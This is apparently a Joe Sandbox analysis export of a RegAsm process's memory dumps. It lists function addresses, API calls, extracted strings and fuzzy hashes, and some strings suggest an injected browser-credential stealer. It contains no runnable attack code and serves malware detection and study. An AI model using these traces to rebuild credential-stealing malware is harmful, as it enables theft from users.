Opcode ID: adf795979cc57f6f129ab8fc86522a7f93ad41ce1df83d48e49a2e249a3f7d2b
Instruction ID: f638d60189444260916278b582b35d4bb29a6db28871768bf825f567e63cbb6f
Opcode Fuzzy Hash: adf795979cc57f6f129ab8fc86522a7f93ad41ce1df83d48e49a2e249a3f7d2b
Instruction Fuzzy Hash: 80B1AE71A04B048BCB05CF98C4906AFF3F5BF89328F554619E85AAB741EB31F946CB91

Function 6C0905F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 035ac6914fc98ba0f02b99c615d3dcdcae4341b770a5a24d0dfee5c3462fde65
Instruction ID: 9486370119c50127bbd63abf4c279fece9fef847328a2ffc5c88a4283c3e8822
Opcode Fuzzy Hash: 035ac6914fc98ba0f02b99c615d3dcdcae4341b770a5a24d0dfee5c3462fde65
Instruction Fuzzy Hash: 0CA16AB4A04605CFDB14CF29C584B9AFBF1BF48318F54866ED49A97B00EB30AA55DF90

Function 6C0C71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C0C6060: moz_xmalloc.MOZGLUE(00000024,D2BEF5E5,00000000,?,00000000,?,?,6C0C5FCB,6C0C79A3), ref: 6C0C6078

free.MOZGLUE(-00000001), ref: 6C0C72F6
free.MOZGLUE(?), ref: 6C0C7311

Strings

333s, xrefs: 6C0C731B
Spliced unique strings, xrefs: 6C0C7340
333s, xrefs: 6C0C7226
Copied unique strings, xrefs: 6C0C7320

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 112b2a4abeb510532dc657993d07e6545fbe000a758a1a7f24e823aebc5f879d
Instruction ID: eba95c931849f37df4ac10cfa6a232a01131d6feec10cb0ff900311135dea9d9
Opcode Fuzzy Hash: 112b2a4abeb510532dc657993d07e6545fbe000a758a1a7f24e823aebc5f879d
Instruction Fuzzy Hash: 62717271F006198FDB18CF6DC89079EB7F2AF88314F25812DD81AAB750DB35A946CB81

Function 6C0E14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0E14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E14E2
GetCurrentThreadId.KERNEL32 ref: 6C0E1546
InitializeConditionVariable.KERNEL32(?), ref: 6C0E15BA
free.MOZGLUE(?), ref: 6C0E16B4

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 5aacc2da91906f7825d4d91fdd9ec28ebe1a97dbe94d79708a586b02e52d537a
Instruction ID: e1a894e83259a6e15cf9fe6b0a5dd5fd992fd99e9c43aa3a9d34c779de8dcdd0
Opcode Fuzzy Hash: 5aacc2da91906f7825d4d91fdd9ec28ebe1a97dbe94d79708a586b02e52d537a
Instruction Fuzzy Hash: 9061AA76A007409FDB118F24C880B9AB7F5BF89308F45851DED8A57612EB31E989CB91

Function 6C0DC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0DC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C0DC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C0DC29E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: ab342948ced490cb3e9216938edab7885e13b5d981a8cf254b880cd2fb224ee6
Instruction ID: 8be2687d1cdc4c9525d59bd3361a98ca191d7af34286f7a71e0fff29004f61b7
Opcode Fuzzy Hash: ab342948ced490cb3e9216938edab7885e13b5d981a8cf254b880cd2fb224ee6
Instruction Fuzzy Hash: CB619B71A04318CFCB15DFA8D880AAEBBF5FF4A314F164529E912A7650C731B944CFA0

Function 6C0D9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0D9FDB
free.MOZGLUE(?,?), ref: 6C0D9FF0
free.MOZGLUE(?,?), ref: 6C0DA006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0DA0BE
free.MOZGLUE(?,?), ref: 6C0DA0D5
free.MOZGLUE(?,?), ref: 6C0DA0EB

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: b1c007fbc08dd23f261223943789030d1688fc2a471a01e262dea7d6fb1c8ec5
Instruction ID: 6574d58fee2880a4aecb70858efa818bedab72b2a55691b36903e625f3d12072
Opcode Fuzzy Hash: b1c007fbc08dd23f261223943789030d1688fc2a471a01e262dea7d6fb1c8ec5
Instruction Fuzzy Hash: 296191799087419FC711CF58C48065AB3F5FF88328F558659E8999B702EB32F986CBC1

Function 00413259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413278
StrCmpCA.SHLWAPI(00000000,004367D8), ref: 004132B1
strtok_s.MSVCRT ref: 00413371

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
Opcode Fuzzy Hash: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C

Function 6C0DDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0DDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C0DD38A,?), ref: 6C0DDC6F
free.MOZGLUE(?,?,?,?,?,6C0DD38A,?), ref: 6C0DDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C0DD38A,?), ref: 6C0DDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C0DD38A,?), ref: 6C0DDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C0DD38A,?), ref: 6C0DDD4A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: a5832f6bd5b2c7ff646d836aad3a3e6ee9ff57feaad304dfb2dd06a0b97d3901
Instruction ID: de7119ef49b76227a7716ca34701398a4e76ad71cc688e90eac103e2bc210e84
Opcode Fuzzy Hash: a5832f6bd5b2c7ff646d836aad3a3e6ee9ff57feaad304dfb2dd06a0b97d3901
Instruction Fuzzy Hash: 44412779A007069FCB00CF99D880A9AB7F5FF89314B564569D945A7B11DB71FC01CBA0

Function 6C0C6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C0BFA80: GetCurrentThreadId.KERNEL32 ref: 6C0BFA8D
Part of subcall function 6C0BFA80: AcquireSRWLockExclusive.KERNEL32(6C10F448), ref: 6C0BFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0C6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C0C67C8

Part of subcall function 6C0D4290: memcpy.VCRUNTIME140(?,?,6C0E2003,6C0E0AD9,?,6C0E0AD9,00000000,?,6C0E0AD9,?,00000004,?,6C0E1A62,?,6C0E2003,?), ref: 6C0D42C4

Strings

data, xrefs: 6C0C6593

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 7ce21636e258366d61e148f9a0957cc076a6f3db842d4517752df3c025d340a2
Instruction ID: e406bb235b5ec6f5821c79d8b80173207c84fb6d5b179d7a61204acb6b5223b5
Opcode Fuzzy Hash: 7ce21636e258366d61e148f9a0957cc076a6f3db842d4517752df3c025d340a2
Instruction Fuzzy Hash: 4AD1AB75B083408FD724DF64C841BAEB7E5AFC5308F10492DE59A97B91EB30A949CB53

Function 6C0CCA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6C0CCA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0CCA69
Sleep.KERNEL32 ref: 6C0CCADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0CCAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0CCAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C0CCB19

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: 491c104d3fd8033acad17b0edbb2bf2d18aac8d74e3cfeaeac133ab2f2a63dfa
Instruction ID: ea851b3767e3cc0f6fb4e8b851dda40f74f249707cb00d9916831decd1a6e27e
Opcode Fuzzy Hash: 491c104d3fd8033acad17b0edbb2bf2d18aac8d74e3cfeaeac133ab2f2a63dfa
Instruction Fuzzy Hash: 1D210431B046088BC308AF78D84426EB7F9FF86349F408628E955A7680EF7095898782

Function 6C0DC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C0DC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C0DC842

Part of subcall function 6C0DCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C0FB5EB,00000000), ref: 6C0DCB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C0DC863
std::_Facet_Register.LIBCPMT ref: 6C0DC875

Part of subcall function 6C0BB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C0FB636,?), ref: 6C0BB143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C0DC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0DC8BC

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 9c96fb1b5e5f504fd1630fef341463d0a440835d6af9215d2db0dcc6603a4fd9
Instruction ID: df9e8355442434f28c7c423dfa35621e840e0f9b951da6f19af07c6511544506
Opcode Fuzzy Hash: 9c96fb1b5e5f504fd1630fef341463d0a440835d6af9215d2db0dcc6603a4fd9
Instruction Fuzzy Hash: 15116075B002099FCB00DFA4C8899AEBBB5EF89358B00012DE60697341DF30A948DBA1

Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
lstrlenA.KERNEL32(?), ref: 00412144
wsprintfA.USER32 ref: 00412156

Strings

%s%s, xrefs: 00412150
C:\Users\user\Desktop\, xrefs: 0041212C, 00412131

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-438050915
Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5

Function 6C0BD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C08EB57,?,?,?,?,?,?,?,?,?), ref: 6C0BD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C08EB57,?), ref: 6C0BD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C08EB57,?), ref: 6C0BD673
free.MOZGLUE(?), ref: 6C0BD888

Strings

|Enabled, xrefs: 6C0BD81E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 464cb04ef17f5b9972bd88d95abb17ec81ac505b1ac6feff984957cca86da8ee
Instruction ID: 1bafa50a1b6c767f4c9e654a937ec6df54f805735be43353fa3ae94e9cda5291
Opcode Fuzzy Hash: 464cb04ef17f5b9972bd88d95abb17ec81ac505b1ac6feff984957cca86da8ee
Instruction Fuzzy Hash: 00A1E0B0A043098FDB10CF69C4907EEFBF5AF49318F18806CD899AB745D736A945CBA1

Function 6C0D0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C0D0270
GetCurrentThreadId.KERNEL32 ref: 6C0D02E9
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0D02F6
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0D033A

Strings

about:blank, xrefs: 6C0D020F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 0e4a80ffd3f7a5138430777cd0ca2f55a71bf312467fff71fbcdaad474687e16
Instruction ID: 5a1a9b4ec1df8bab00a51b7cac4e9e41dfb740cd773e329848033fbdb0275480
Opcode Fuzzy Hash: 0e4a80ffd3f7a5138430777cd0ca2f55a71bf312467fff71fbcdaad474687e16
Instruction Fuzzy Hash: 6351C074B043198FCB00DF58C880AAEB7F5FF49328F654519D92AA7B41DB31B906CBA4

Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C

Strings

ERROR_RUN_EXTRACTOR, xrefs: 004082BE
v20, xrefs: 00408286
v10, xrefs: 004082CE

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99

Function 6C0CE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C0CE084,00000000), ref: 6C0CE137

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C0CE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C0CE1E9

Part of subcall function 6C0C99A0: GetCurrentThreadId.KERNEL32 ref: 6C0C99C1
Part of subcall function 6C0C99A0: AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0C99CE
Part of subcall function 6C0C99A0: ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0C99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C0CE13F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 96fd3fff694fd799788678ec8675d4e35981bf409ecd1f7cf4f613c2d08f33d4
Instruction ID: e7dfb2d4d9d8167521275270c2592e5ae86761a6997cd15b40c05dd08e9f8284
Opcode Fuzzy Hash: 96fd3fff694fd799788678ec8675d4e35981bf409ecd1f7cf4f613c2d08f33d4
